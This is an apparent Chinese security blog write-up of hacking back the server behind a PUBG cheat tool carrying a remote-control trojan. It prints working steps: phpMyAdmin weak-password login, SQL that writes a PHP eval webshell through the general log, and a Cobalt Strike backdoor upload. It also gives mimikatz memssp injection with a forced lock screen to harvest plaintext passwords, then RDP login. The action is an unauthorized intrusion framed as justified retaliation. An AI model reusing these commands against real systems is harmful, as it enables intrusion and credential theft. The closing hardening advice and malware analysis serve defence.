记一次对PUBG外挂病毒的反制过程
字数 1236 2025-08-15 21:30:31

对PUBG外挂病毒的反制技术分析

1. 事件背景

  • 发现一个伪装成"压枪神器"的USB设备,实际为加密狗+无后坐力外挂软件
  • 外挂软件包含远程控制木马,用户电脑长期作为肉鸡被控制
  • 通过技术手段反制攻击者服务器,获取控制权限

2. 技术分析流程

2.1 初步分析

  1. 使用微步沙箱分析外挂软件行为

    • 检测到持久化行为
    • 检测到系统信息读取行为
    • 确认存在远程控制功能

  2. 提取网络交互信息

    • 发现HTTP协议通信的IP地址
    • 访问http://10x.xx.xx.xx/1/1.txt获取公告信息
    • 确认该IP为外挂服务器

2.2 Web服务探测

  1. 使用dirmap进行目录扫描
    • 发现phpMyAdmin管理界面
    • 使用弱口令root/root成功登录

2.3 获取Webshell

  1. 通过phpMyAdmin日志功能获取Webshell

    set global general_log='on';
show variables like "general_log%";
set global general_log_file ="C:\phpStudy\PHPTutorial\WWW\info.php";
select '<?php eval($_POST['tools']);?>';

  2. 使用中国菜刀连接Webshell

    • 确认网站目录结构
    • 获取初步控制权限

2.4 权限提升

  1. 使用Cobalt Strike(CS)生成后门程序

    • 上传splww64.exe到目标服务器
    • 通过Webshell执行后门程序
    • CS成功上线,获取系统权限

  2. 尝试获取密码

    • 使用mimikatz抓取密码失败(Windows Server 2012 R2已修复漏洞)
    • 无法通过hash注入获取权限

2.5 巧取明文密码

  1. 使用mimikatz内存SSP技术

    C:/mimikazt.exe privilege::debug misc::memssp exit
    • 注入成功后显示"Injected =)"

  2. 强制锁屏触发密码记录

    rundll32.exe user32.dll,LockWorkStation

  3. 获取明文密码

    • 密码记录在C:\Windows\System32\mimilsa.log
    • 下载日志文件查看管理员密码

2.6 远程登录系统

  1. 使用nmap扫描RDP端口

    nmap -p 1-65355 10x.xx.xx.xx
    • 发现默认3389端口开放

  2. 使用获取的密码远程登录

    • 确认服务器控制两千多台肉鸡

3. 关键技术点

  1. 信息收集技术

    • 沙箱分析恶意软件行为
    • 提取软件交互的IP/URL作为突破口
    • 目录扫描发现管理界面

  2. Web渗透技术

    • phpMyAdmin弱口令利用
    • 日志文件导出Webshell技术
    • 中国菜刀Webshell管理

  3. 权限提升技术

    • Cobalt Strike后门部署
    • mimikatz密码提取技术
    • SSP内存注入技术

  4. 密码获取技术

    • 传统hash注入失效时的替代方案
    • 强制锁屏触发密码记录
    • 日志文件分析获取明文密码

4. 安全建议

  1. 服务器安全配置

    • 禁用或修改phpMyAdmin默认路径
    • 使用强密码策略,杜绝弱口令
    • 限制数据库远程访问权限

  2. 日志监控

    • 监控异常日志文件修改
    • 监控数据库日志配置变更

  3. 系统加固

    • 及时更新系统补丁
    • 限制不必要的服务端口
    • 启用多因素认证

  4. 应急响应

    • 建立异常登录检测机制
    • 定期检查系统可疑进程
    • 实施最小权限原则

5. 总结

本次反制过程展示了从恶意软件分析到完整控制攻击者服务器的完整技术链,核心漏洞在于弱口令导致的连锁反应。攻击者服务器存在多处安全隐患,包括弱口令、未修复的Web服务漏洞、缺乏日志监控等。此案例强调了网络安全基础防护的重要性,特别是杜绝弱口令这一基本安全原则。

对PUBG外挂病毒的反制技术分析 1. 事件背景 发现一个伪装成"压枪神器"的USB设备,实际为加密狗+无后坐力外挂软件 外挂软件包含远程控制木马,用户电脑长期作为肉鸡被控制 通过技术手段反制攻击者服务器,获取控制权限 2. 技术分析流程 2.1 初步分析 使用微步沙箱分析外挂软件行为 检测到持久化行为 检测到系统信息读取行为 确认存在远程控制功能 提取网络交互信息 发现HTTP协议通信的IP地址 访问 http://10x.xx.xx.xx/1/1.txt 获取公告信息 确认该IP为外挂服务器 2.2 Web服务探测 使用dirmap进行目录扫描 发现phpMyAdmin管理界面 使用弱口令root/root成功登录 2.3 获取Webshell 通过phpMyAdmin日志功能获取Webshell 使用中国菜刀连接Webshell 确认网站目录结构 获取初步控制权限 2.4 权限提升 使用Cobalt Strike(CS)生成后门程序 上传 splww64.exe 到目标服务器 通过Webshell执行后门程序 CS成功上线,获取系统权限 尝试获取密码 使用mimikatz抓取密码失败(Windows Server 2012 R2已修复漏洞) 无法通过hash注入获取权限 2.5 巧取明文密码 使用mimikatz内存SSP技术 注入成功后显示"Injected =)" 强制锁屏触发密码记录 获取明文密码 密码记录在 C:\Windows\System32\mimilsa.log 下载日志文件查看管理员密码 2.6 远程登录系统 使用nmap扫描RDP端口 发现默认3389端口开放 使用获取的密码远程登录 确认服务器控制两千多台肉鸡 3. 关键技术点 信息收集技术 沙箱分析恶意软件行为 提取软件交互的IP/URL作为突破口 目录扫描发现管理界面 Web渗透技术 phpMyAdmin弱口令利用 日志文件导出Webshell技术 中国菜刀Webshell管理 权限提升技术 Cobalt Strike后门部署 mimikatz密码提取技术 SSP内存注入技术 密码获取技术 传统hash注入失效时的替代方案 强制锁屏触发密码记录 日志文件分析获取明文密码 4. 安全建议 服务器安全配置 禁用或修改phpMyAdmin默认路径 使用强密码策略,杜绝弱口令 限制数据库远程访问权限 日志监控 监控异常日志文件修改 监控数据库日志配置变更 系统加固 及时更新系统补丁 限制不必要的服务端口 启用多因素认证 应急响应 建立异常登录检测机制 定期检查系统可疑进程 实施最小权限原则 5. 总结 本次反制过程展示了从恶意软件分析到完整控制攻击者服务器的完整技术链,核心漏洞在于弱口令导致的连锁反应。攻击者服务器存在多处安全隐患,包括弱口令、未修复的Web服务漏洞、缺乏日志监控等。此案例强调了网络安全基础防护的重要性,特别是杜绝弱口令这一基本安全原则。